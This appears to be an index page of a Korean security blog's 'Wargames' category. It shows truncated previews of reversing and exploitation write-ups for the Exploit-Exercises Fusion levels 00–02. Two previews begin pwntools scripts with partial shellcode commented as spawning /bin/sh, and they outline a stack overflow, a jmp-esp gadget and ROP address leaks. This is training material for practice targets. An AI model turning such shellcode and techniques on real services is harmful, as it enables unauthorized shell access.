Wargames 썸네일형 리스트형 [Reversing.kr] CustomShell 보호되어 있는 글입니다. 더보기 [Exploit-Exercise] Fusion level02 Fusion Level02 - There is xor encryption with random value. First getting xor table.- just ROP!. leaking write() address and get system() address with 'offset'. - i just use system(). There is another way to get shell. execve()- Using execve() would be more cleaner and comfortable for making payload. 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525.. 더보기 [Exploit-Exercise] Fusion level01 Fusion Level01 - Still NX is disabled but ASLR is on. - Now, we can't get buffer address from binary. - All u need is 'jmp esp' gadget 1234567891011121314151617from pwn import * # dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/shsc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x.. 더보기 [Exploit-Exercise] Fusion level00 Fusion Level00- There aren't any memory protections even NX. So i just use shell-code.- That service is on port 20000. and be careful at 'fd'. - In fix_path(), There is stack buffer overflow vulnerability.- RET -> 140 ~ 143 123456789101112131415161718from pwn import # dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/shsc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\.. 더보기 [Reversing.kr] MetroApp 보호되어 있는 글입니다. 더보기 이전 1 2 3 4 5 ··· 12 다음